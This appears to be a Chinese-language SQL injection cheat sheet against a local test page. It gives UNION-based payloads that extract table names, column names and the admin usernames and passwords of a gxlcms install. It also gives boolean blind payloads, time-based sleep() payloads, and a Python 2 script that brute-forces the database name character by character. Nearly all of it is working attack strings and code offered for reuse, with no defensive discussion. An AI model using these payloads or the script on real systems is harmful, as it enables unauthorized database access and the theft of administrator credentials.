一：union报错注入
猜字段长度：
order by 28

先显示位
http://127.0.0.1/sql.php?cmd=-1 UNION SELECT 1,2,3,4,5,6,7,8,9

当前数据库：
http://127.0.0.1/sql.php?cmd=-1 UNION SELECT 1,2,3,4,5,6,7,8,database()

爆数据表：
http://127.0.0.1/sql.php?cmd=1 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,group_concat(table_name) from information_schema.tables where table_schema='gxlcms'

爆字段：
http://127.0.0.1/sql.php?cmd=-1 UNION SELECT 1,2,3,4,5,6,7,8,group_concat(column_name) from information_schema.columns where table_name='gxl_admin'

出数据
http://127.0.0.1/sql.php?cmd=-1 UNION SELECT 1,2,3,4,5,6,7,8,group_concat(admin_name,admin_pwd) from gxl_admin

二：bool盲注
数据库名是：gxlcms

判断当前数据库长度/内容
http://127.0.0.1/sql.php?cmd=1 and length(database())=6
出数据库名
http://127.0.0.1/sql.php?cmd=1 and mid(database(),2,1)='x'

#coding:utf-8
#简单boole 盲注脚本

import urllib
#获取当前数据库长度,并猜解出来
url = 'http://127.0.0.1/sql.php?cmd=1'
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
table1=''
for i in range(1,20):
    payloadl = ' and length(database())=%s'%i
    html = urllib.urlopen(url+payloadl).read()
    #print html
    if 'Array' in html:#判断语句自己修改
        print "The length is %s: "%i
        length = i
        break
for x in range(1,length+1):
    for p in payloads:
        p2 = ' and mid(database(),%s,1)=\'%s\'' %(x,p)
        r2 = urllib.urlopen(url+p2).read()
        if 'Array' in r2:#判断语句自己修改
            table1+=p
            print table1

三：时间注入
判断数据库长度
http://127.0.0.1/sql.php?cmd=1 and if(length(database())=6,sleep(5),1);

判断数据库内容：
http://127.0.0.1/sql.php?cmd=1 and if(mid(database(),1,1)='g',sleep(5),1);

时间盲注的脚本之前也写了个，将就着用吧！